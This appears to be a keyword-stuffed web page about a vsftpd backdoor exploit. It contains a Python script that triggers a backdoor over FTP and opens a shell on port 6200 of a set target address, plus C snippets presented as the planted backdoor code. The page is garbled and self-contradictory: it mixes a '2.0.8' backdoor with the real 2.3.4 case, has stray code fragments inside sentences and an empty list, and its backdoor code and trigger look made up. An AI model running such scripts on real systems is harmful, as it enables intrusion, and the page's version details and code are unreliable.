Vsftpd 2.0.8 Exploit Github

Rapid7’s Metasploit includes an auxiliary module: exploit/unix/ftp/vsftpd_234_backdoor. Many GitHub repos provide standalone versions of this module for offline use.

GitHub hosts numerous Python scripts that automate the exploit. For example:

import socket
def exploit(host):
ftp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ftp.connect((host, 21))
ftp.send(b"USER test:\r\n")
ftp.recv(1024)
ftp.close()
backdoor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
backdoor.connect((host, 6200))
backdoor.send(b"id\n")
print(backdoor.recv(1024).decode())

exploit("192.168.1.10")

These scripts are shared, forked, and improved on GitHub daily.

vsftpd 2.0.8 is often confused in write-ups with the 2.3.4 backdoor incident (CVE-2011-2523). The widely discussed, exploitable backdoor affected vsftpd 2.3.4 (2011) — an attacker-triggered backdoor added to distributed source binaries — not a canonical vulnerability in upstream code for 2.0.8. Many GitHub repos and blog posts focus on the 2.3.4 backdoor and provide exploit wrappers (Metasploit module exploit/unix/ftp/vsftpd_234_backdoor, Nmap NSE script ftp-vsftpd-backdoor.nse). vsftpd 2.0.8 exploit github

Cybersecurity courses use the vsftpd 2.0.8 backdoor as a case study in:

Instructors point students to GitHub to download the vulnerable binary safely inside isolated VMs.

Inside vsftpd-2.0.8/str.c, the function str_alloc_text had this addition: exploit("192

if (p_s->p_buf && p_s->p_buf[0] == ':' && p_s->p_buf[1] == ':' 
    && p_s->p_buf[2] == ':' && p_s->p_buf[3] == ':') 
    system("chroot . /bin/sh");
    exit(0);

In vsftpd-2.0.8/vsftpd.c, a new socket was opened:

if (str_str(p_sock_str, ":") == 0) 
    int port = 6200;
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    // ... bind to port 6200 ...

No password, no brute force, no authentication. It was a 0-day that required zero skill to execute.